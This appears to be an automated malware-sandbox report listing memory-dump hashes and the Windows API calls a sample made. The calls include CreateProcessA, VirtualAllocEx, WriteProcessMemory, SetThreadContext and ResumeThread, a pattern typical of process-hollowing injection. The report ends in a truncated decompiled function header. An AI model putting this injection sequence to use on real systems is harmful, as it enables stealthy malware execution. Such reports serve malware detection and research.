                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: D0l$D0l$D0l
                                            • API String ID: 0-1921109830
                                            • Opcode ID: da1bfc36be05c938ef7120cbc5f7efd8863b9aa4100cf448e6cab460cd5a60d7
                                            • Instruction ID: 225acde784ac39337399dbc96ce4417c1b97eead1521fe03ab753772b4c50d42
                                            • Opcode Fuzzy Hash: da1bfc36be05c938ef7120cbc5f7efd8863b9aa4100cf448e6cab460cd5a60d7
                                            • Instruction Fuzzy Hash: 0F726BB0A002199FDB14DFA9D994BAEBBB3FF89304F158069F415AB361DB34D841CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 12d9d10ab6bb43df7d760db0488a2d8d360c9afb5f96e458a264cd58b3d9c7c2
                                            • Instruction ID: a0647ebaca27a7f6012732e8d9a960699b318c2c0f4b46320294fcffc13fb8dc
                                            • Opcode Fuzzy Hash: 12d9d10ab6bb43df7d760db0488a2d8d360c9afb5f96e458a264cd58b3d9c7c2
                                            • Instruction Fuzzy Hash: 78B18FB5A00215CFCB14CF69C984AADBBB1BF84721F168059F825AB3A1DB30ED45CF60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 946994a1f2cb5e3afad0d2dc1630e8013362fe45d4741246d7a987d224a95820
                                            • Instruction ID: 5cfc88a4c12c099a56d1056bbbe258f762ff3c40296415fce20014a86fd89f89
                                            • Opcode Fuzzy Hash: 946994a1f2cb5e3afad0d2dc1630e8013362fe45d4741246d7a987d224a95820
                                            • Instruction Fuzzy Hash: A8A1F3B4E04249CFDB14DFA9C48469EFBF2AF89314F25C129E428AB345D7389981CF61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7cc17745fb5d55f2ceb9a04352f6fcf76b6c6c68b560701f31d36cb2ee3979be
                                            • Instruction ID: 17b54e1aa1cafe370ac2b68a1fbae4f3146ebe81775019bf6249a61d36d1be30
                                            • Opcode Fuzzy Hash: 7cc17745fb5d55f2ceb9a04352f6fcf76b6c6c68b560701f31d36cb2ee3979be
                                            • Instruction Fuzzy Hash: 667118B4E04249CFDB14DFA9C48469EBBF2AF89314F24C12AE428AB345D7389945CF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 11128a4b85ec308721a5e39130255c3f364af2748dae66348a2b947c912d1f27
                                            • Instruction ID: 2b9e5c833d382f0d595b6e2bda0c417d9732ad052d4fe687115515af0b897778
                                            • Opcode Fuzzy Hash: 11128a4b85ec308721a5e39130255c3f364af2748dae66348a2b947c912d1f27
                                            • Instruction Fuzzy Hash: BE4102B4910269CFDB64DF64C884BECB7B1EB8A314F0081EAD419AB291DB349EC5CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b167bc9e5df778756621b981ce35a1c494b6d04d4ac1569e09c0bba027ee60c
                                            • Instruction ID: f76bc501f34b3c77b99b3e12f01dd57c85c955180b3ec2dab6c186030ee14fc2
                                            • Opcode Fuzzy Hash: 1b167bc9e5df778756621b981ce35a1c494b6d04d4ac1569e09c0bba027ee60c
                                            • Instruction Fuzzy Hash: 18219CB5904248CFCB05DFA4C554BEDBFF1AF4E311F14916AE054B72A1C7398944CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3759762f19f10bb4a39161421616f9f41aa3c725b4a556376edc79db27f3fd7c
                                            • Instruction ID: 84a29bdfb38b2ac7f7b7064a444b9163e14c51a6a6dd25d76d16beb363cefe6d
                                            • Opcode Fuzzy Hash: 3759762f19f10bb4a39161421616f9f41aa3c725b4a556376edc79db27f3fd7c
                                            • Instruction Fuzzy Hash: 9BE068E1E4C395DFD7014FB488A56BABFB0AB0B205F24518AF091F71A1C2A8C901C762
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A3AB0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: a514932505c90372560ef6a4fd9f12b3ca3aa5f1ba51fcbc0310c409148a5929
                                            • Instruction ID: 7a283c7a5e7a4238c083f633eb4e4bb5826fd80d957d36a50a6b129287df7dc9
                                            • Opcode Fuzzy Hash: a514932505c90372560ef6a4fd9f12b3ca3aa5f1ba51fcbc0310c409148a5929
                                            • Instruction Fuzzy Hash: E0A16CB1D00229CFDB10CFA5C841BDDBBB2BF88314F1585A9F859A7250DB749981CF92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A3AB0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: cc2d8eb7726e706a1ab3f7b61fb2ddcaff38a93d66a45e3370f8f35750e2d1cc
                                            • Instruction ID: 6ba53ad5a6d43f91958d31a7017b8a1d3d07ec15932ea2cbfd207cfca7d8e42f
                                            • Opcode Fuzzy Hash: cc2d8eb7726e706a1ab3f7b61fb2ddcaff38a93d66a45e3370f8f35750e2d1cc
                                            • Instruction Fuzzy Hash: 77916CB1D0022ACFDB10CFA5C841BDDBBB2BF88314F1585A9F859A7250DB749985CF92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A3A6B0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: b4b5135d328bbdab56027365fd8b0a047268c55ae5b7512787f1abe1ba676362
                                            • Instruction ID: 06155e4ca3e2d406b5fe1fd59bff9ec0e8b4feb42407259a62a5991b4616a3ef
                                            • Opcode Fuzzy Hash: b4b5135d328bbdab56027365fd8b0a047268c55ae5b7512787f1abe1ba676362
                                            • Instruction Fuzzy Hash: 902148B59003599FCB10CFA9C8847EEBBF5FF48314F10842AE958A7250DB789954CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A3A6B0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 8325d51a073c2bd4c4196d931fa3ce4e8fb5d35a11769b8096451a4543abd6ae
                                            • Instruction ID: 772c3e8ab732f1a5b988d3b12c4b3e425e9c42dd9c688f8f9cf7f985b5fa445a
                                            • Opcode Fuzzy Hash: 8325d51a073c2bd4c4196d931fa3ce4e8fb5d35a11769b8096451a4543abd6ae
                                            • Instruction Fuzzy Hash: 152127B59003599FCB10CFA9C884BEEBBF5FF48314F10842AE959A7250CB789954CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A3A7C0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: f40357a276d4a34206842b4888e552b10fd6e270e49961552244abcc07d55275
                                            • Instruction ID: b58277eb3d3a6c2591d575abbf4670b924f59e143a2dc33e8cf8f16b2068ec68
                                            • Opcode Fuzzy Hash: f40357a276d4a34206842b4888e552b10fd6e270e49961552244abcc07d55275
                                            • Instruction Fuzzy Hash: D62139B19003599FCB10CFA9C8847EEBBB4FF48310F10842AE558A7250C7789940DFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetThreadContext.KERNELBASE(?,00000000), ref: 07A3A506
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: ContextThread
                                            • String ID:
                                            • API String ID: 1591575202-0
                                            • Opcode ID: 603ca60220abf30b1b46c86107aeff7ccd139756ba5a971d3be921438aa00b9a
                                            • Instruction ID: c30ac2668255a910f675e4e278ca92f384dc8c7eeee59ad3b6eabdb9089de1b4
                                            • Opcode Fuzzy Hash: 603ca60220abf30b1b46c86107aeff7ccd139756ba5a971d3be921438aa00b9a
                                            • Instruction Fuzzy Hash: 91213DB1D003199FDB10CFA9C4457EEBBF4EF48314F14842AE959A7240DB789944CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A3A7C0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 50f6526f25c45c97ef0a7fa94f92c915809ce8a95c4e16f2230b2d440b161ae1
                                            • Instruction ID: 8427fa443030b5ef38ecd475cdc32a167bc53f7dd6775251c7815a1e22f251e1
                                            • Opcode Fuzzy Hash: 50f6526f25c45c97ef0a7fa94f92c915809ce8a95c4e16f2230b2d440b161ae1
                                            • Instruction Fuzzy Hash: BB2128B19003599FCB10DFAAC880BEEBBF5FF48314F10842AE958A7250D7789940DFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetThreadContext.KERNELBASE(?,00000000), ref: 07A3A506
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: ContextThread
                                            • String ID:
                                            • API String ID: 1591575202-0
                                            • Opcode ID: aa8b5da581f62262aa2a554c3c99aa272885fb3a582dca99f849b99432f93e79
                                            • Instruction ID: ac6cfd13e15240366103d32b292b856fb49d21d685efb99da038f77c8fbee14d
                                            • Opcode Fuzzy Hash: aa8b5da581f62262aa2a554c3c99aa272885fb3a582dca99f849b99432f93e79
                                            • Instruction Fuzzy Hash: DB214CB1D003199FDB10CFAAC4847EEBBF4EF88314F14842AE559A7240DB789944CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A3A5CE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 4ec1eb026d079e8bc524f62be0ea6d21f9dc817a51eddd2f3a2a60d23486001a
                                            • Instruction ID: 4660388a78f53e116bf869080a76cac53f3cb0de8e0e7316afcdbe9f12641873
                                            • Opcode Fuzzy Hash: 4ec1eb026d079e8bc524f62be0ea6d21f9dc817a51eddd2f3a2a60d23486001a
                                            • Instruction Fuzzy Hash: 19113A719002599FDB10CFA9C844BDFBBF5AF88324F14841AE555A7250C7799550CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A3A5CE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: eecfa682abd80665cbc93fe78976f768a3ce7e491bacc30c02eddf85d5b7d7a8
                                            • Instruction ID: 4a995a3a7854419723ea6385b321b4406ca4e10633d9c6b0dc52bf79c4b132e9
                                            • Opcode Fuzzy Hash: eecfa682abd80665cbc93fe78976f768a3ce7e491bacc30c02eddf85d5b7d7a8
                                            • Instruction Fuzzy Hash: 94116A71900249DFDB10CFA9C844BEFBBF5BF88314F14881AE555A7210C7799950CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 4c567c787e8091813ca0b358b337a485065bd6c83935e6097c8cf9605c43e65f
                                            • Instruction ID: 618409a8df4128d13d59a215b2fbbe12996bf80e575e0afcf725b011cb6ccf67
                                            • Opcode Fuzzy Hash: 4c567c787e8091813ca0b358b337a485065bd6c83935e6097c8cf9605c43e65f
                                            • Instruction Fuzzy Hash: AD115BB1D002598FDB10CFAAC4487EEFBF4EF88324F148429E555A7240CB786944CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 0d0b212eca85575efebb4c25a592070b2431fe48524fbfb5566178a468326af6
                                            • Instruction ID: e821f7d4c1917e723833c97d7650ae15c6338cb4059ed6e17d7542d43f4133ee
                                            • Opcode Fuzzy Hash: 0d0b212eca85575efebb4c25a592070b2431fe48524fbfb5566178a468326af6
                                            • Instruction Fuzzy Hash: 10113AB19003598FDB10DFAAC4447EEFBF4AF88224F148429E555B7240CB78A944CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 07A3CA65
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: fb454ea4b00a2eefd5b26cbfe3c8e3d1391cd0bb8c7326d39128415014573755
                                            • Instruction ID: 7fd5161198a2dbbb642b0630feb652b9778738ad225a33fefa4094b2c6984c2c
                                            • Opcode Fuzzy Hash: fb454ea4b00a2eefd5b26cbfe3c8e3d1391cd0bb8c7326d39128415014573755
                                            • Instruction Fuzzy Hash: 0511F5B58003499FDB10CF99D884BDEBFF8EB49324F14881AE464A7640C374A554CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 07A3CA65
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: a466e5f8970eab635a569f17b3b51eb79b988c24e93d34df5f560c4ee266b917
                                            • Instruction ID: c59770541b0a8e93282030b11d17af792061ba811273e79a4720ac18e374f6a1
                                            • Opcode Fuzzy Hash: a466e5f8970eab635a569f17b3b51eb79b988c24e93d34df5f560c4ee266b917
                                            • Instruction Fuzzy Hash: F811E5B58003599FDB10CF99D884BDEBBF8FB48324F14881AE964B7640C378A554CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.651195773.000000000107D000.00000040.00000001.sdmp, Offset: 0107D000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 514a62291b0ab0dff525e23cf6ca120f9b68910d1da92c911729cb1c1cb5a4b0
                                            • Instruction ID: 7e4a17378e8d72e4ca92785da1a492bfb20980f417bb77a401a744d23444f48e
                                            • Opcode Fuzzy Hash: 514a62291b0ab0dff525e23cf6ca120f9b68910d1da92c911729cb1c1cb5a4b0
                                            • Instruction Fuzzy Hash: 24213AB1904240EFDB01CF54D8C0B5ABFA5FF84324F24C6A9E9855B247C736E856C7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.651219950.000000000108D000.00000040.00000001.sdmp, Offset: 0108D000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d02d2958e78657cc607857b8c4113de119c8a9627032bf1ad0a8e5c299700f8
                                            • Instruction ID: 3763e30f1f43c88458716377c3392cc47f097bbc94ab00f14a52b390f0e98e0e
                                            • Opcode Fuzzy Hash: 2d02d2958e78657cc607857b8c4113de119c8a9627032bf1ad0a8e5c299700f8
                                            • Instruction Fuzzy Hash: 93212571508240DFDB15EF94D8C0B1ABBA5FB84364F24CBA9E9C94B286C736D807CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.651219950.000000000108D000.00000040.00000001.sdmp, Offset: 0108D000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d3ceb6818559e357fefdc03033e19d9c677d957a4e8f081844f2acab53107900
                                            • Instruction ID: 8641097dd135ada54a01bb80ef9816c33e74629e4e33f3ec02f386a7208abea6
                                            • Opcode Fuzzy Hash: d3ceb6818559e357fefdc03033e19d9c677d957a4e8f081844f2acab53107900
                                            • Instruction Fuzzy Hash: CB2137B1508240EFDB41EF94D5C0B2ABBA5FB94324F24C7ADD9C94B286C336D806CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.651195773.000000000107D000.00000040.00000001.sdmp, Offset: 0107D000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 987ae082b2f359035be596b84dcad585c5d9c7b80c54fd1badd6de72d9b1f1a2
                                            • Instruction ID: e922ef22d585172fd912c5c2014ddc70b12835edc22943e25f563bfb8e876677
                                            • Opcode Fuzzy Hash: 987ae082b2f359035be596b84dcad585c5d9c7b80c54fd1badd6de72d9b1f1a2
                                            • Instruction Fuzzy Hash: 0411AF76804280DFDB12CF54D9C4B56BFB1FB84324F24C6A9D8850B616C33AE456CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.651219950.000000000108D000.00000040.00000001.sdmp, Offset: 0108D000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 84522397b0c0072479584b34e9b527c289f971b5c41eac134402e64a3c6926ae
                                            • Instruction ID: 684e0ba18b2330078f4febd3fd4629f2bd6656317f5fd120d650c2fb1d6e2b1d
                                            • Opcode Fuzzy Hash: 84522397b0c0072479584b34e9b527c289f971b5c41eac134402e64a3c6926ae
                                            • Instruction Fuzzy Hash: BE11BB75908280DFDB42DF54D5C4B15FBB1FB84324F28C6AAD8894B696C33AD44ACB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.651219950.000000000108D000.00000040.00000001.sdmp, Offset: 0108D000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 84522397b0c0072479584b34e9b527c289f971b5c41eac134402e64a3c6926ae
                                            • Instruction ID: 06271c543cbe64e1690f9fd67948915d23a4225a2090413a6c366cfa85fb3d78
                                            • Opcode Fuzzy Hash: 84522397b0c0072479584b34e9b527c289f971b5c41eac134402e64a3c6926ae
                                            • Instruction Fuzzy Hash: C611AC75508280DFDB12DF54D584B15BBA1EB44224F24C6AAE8894B696C33AD44BCF61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.651195773.000000000107D000.00000040.00000001.sdmp, Offset: 0107D000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: becf4d4b8ce27c18561d18236b3c2088baeb7e22cad0d69d0cd1122a9b0f19e7
                                            • Instruction ID: c6319fe9dba1a2741ade09cdd7b0d3f57dcdbb5b7c5c176753e7faf75bd542dd
                                            • Opcode Fuzzy Hash: becf4d4b8ce27c18561d18236b3c2088baeb7e22cad0d69d0cd1122a9b0f19e7
                                            • Instruction Fuzzy Hash: 9E0120718083C09AF7104E55CC84B66FFD8FF41234F08C55AEE844B246E7799844CBB5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.651195773.000000000107D000.00000040.00000001.sdmp, Offset: 0107D000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b2ad4f520ce68d6f6bafd001d1730bc0de7970a27c1b32f5e5566dcf30994aee
                                            • Instruction ID: 9320b606002076e2ad2a8168dbf068fe5abd1985911d9ecd9e886238ae749d1b
                                            • Opcode Fuzzy Hash: b2ad4f520ce68d6f6bafd001d1730bc0de7970a27c1b32f5e5566dcf30994aee
                                            • Instruction Fuzzy Hash: A2F09671404384AEE7518E1ACCC4B66FFE8EF81634F18C45AED485B287D7799844CBB5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.650807903.0000000000962000.00000002.00020000.sdmp, Offset: 00960000, based on PE: true
                                            • Associated: 00000000.00000002.650797619.0000000000960000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.650852695.00000000009C4000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f8d9c6644249dd40319717c8680fb5221ed0250c9ad842b7f002a7434f70082
                                            • Instruction ID: 4dad0bf35faeb60903dd609fffb7409257426960bd9b530dea0472a63d061df7
                                            • Opcode Fuzzy Hash: 6f8d9c6644249dd40319717c8680fb5221ed0250c9ad842b7f002a7434f70082
                                            • Instruction Fuzzy Hash: 25F2796100E7C25FDB038B749D711E1BFB5AE5322431E48D7D4C0CF4A3E21969A9EBA6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.650807903.0000000000962000.00000002.00020000.sdmp, Offset: 00960000, based on PE: true
                                            • Associated: 00000000.00000002.650797619.0000000000960000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.650852695.00000000009C4000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e4cca4bdf7a2deb0d126d08fdff85d31f4afd462d11d84347a8c15abe18a08c
                                            • Instruction ID: d88095cab98b70616676a127377a21a99d867c031bff234edb9f9d6d1b0ec057
                                            • Opcode Fuzzy Hash: 6e4cca4bdf7a2deb0d126d08fdff85d31f4afd462d11d84347a8c15abe18a08c
                                            • Instruction Fuzzy Hash: 8AF2246140F7C29FC7038B749D756A0BFB1AE5321471E49CBC4C18F1A3E2195A9AEB63
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.650807903.0000000000962000.00000002.00020000.sdmp, Offset: 00960000, based on PE: true
                                            • Associated: 00000000.00000002.650797619.0000000000960000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.650852695.00000000009C4000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 96be765d227373fb7c4916afdcb49b650645f133a3ce0a63cf5e0e0e5884343e
                                            • Instruction ID: 4f4855e7b8f5a2ffffc75ba164d897c3ac1bd83302794820ad02c2ce678b3473
                                            • Opcode Fuzzy Hash: 96be765d227373fb7c4916afdcb49b650645f133a3ce0a63cf5e0e0e5884343e
                                            • Instruction Fuzzy Hash: F292466244EBC15FCB035B782DB12D17FB29D6722430E49C7C4C08F5A3E4196A9BE762
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bcfe2d86c08dfaa0227e6c20cd16e11605e805ee7feea873a0241bcd204abb2a
                                            • Instruction ID: 774e61bf12596e37264435616ad1b266372ef461f726e86334de4159885abac3
                                            • Opcode Fuzzy Hash: bcfe2d86c08dfaa0227e6c20cd16e11605e805ee7feea873a0241bcd204abb2a
                                            • Instruction Fuzzy Hash: B4824BB0A0060ACFDB14CF68D584AAEBBF2BF89315F158569F465DB2A1C730EC41CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e66a9bd6a876644cb171890d794effe59a5eb57d3f62e08e050b6a88071d25ee
                                            • Instruction ID: 03cd6a9f3b71db3d81d1e09798cb6cd9aed6f6aae70eb65e5aff92339cc618de
                                            • Opcode Fuzzy Hash: e66a9bd6a876644cb171890d794effe59a5eb57d3f62e08e050b6a88071d25ee
                                            • Instruction Fuzzy Hash: 8DD158BB9197909FEB15EFB8F4054D5BFA4FA1A77131480BBE014CAA09E7314142CBE5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 02a26637b7d843d168b0262d6f00dc4a8bd9e05d1f44bb5d12b109c6948ce902
                                            • Instruction ID: 7d4069a180c554ba7a257662bef91b000314a66c93fb29f558bfd5de01837a56
                                            • Opcode Fuzzy Hash: 02a26637b7d843d168b0262d6f00dc4a8bd9e05d1f44bb5d12b109c6948ce902
                                            • Instruction Fuzzy Hash: 33A18EB0E116288FEB64DF69C980BCEBBF5BF88304F5482E5D15CA6205E7305A96CF05
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e717b43a91ff58c0c73f466001e02d9bfb0a994cb9b10368cf6e7d970ece39fd
                                            • Instruction ID: 041d61afc4a41326f04a615c645aae3db1562c6c4c0cf97c9399c97fdddbdbb8
                                            • Opcode Fuzzy Hash: e717b43a91ff58c0c73f466001e02d9bfb0a994cb9b10368cf6e7d970ece39fd
                                            • Instruction Fuzzy Hash: 08515970D156498FD744EF75E8457AE7FF2EF89208F14C629E008AF2A4DF7468068BA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6b2e5c5687473729d63b2b8df23433fa34b94f694fe01d9f26bcdbb3c75b1bd7
                                            • Instruction ID: 3bd21bdfbb3d6800c49e1d7542fab5b43b80b70ec05509280b4a33d67a6f2833
                                            • Opcode Fuzzy Hash: 6b2e5c5687473729d63b2b8df23433fa34b94f694fe01d9f26bcdbb3c75b1bd7
                                            • Instruction Fuzzy Hash: 44517A70E156098FD744EFA5E8447AEBBF2EF89208F14C529E0049F3A4DF706806CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Executed Functions

                                            C-Code - Quality: 85%
                                            			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                            				struct _WIN32_FIND_DATAW _v596;
                                            				void* __ebx;
                                            				void* _t35;
                                            				int _t43;
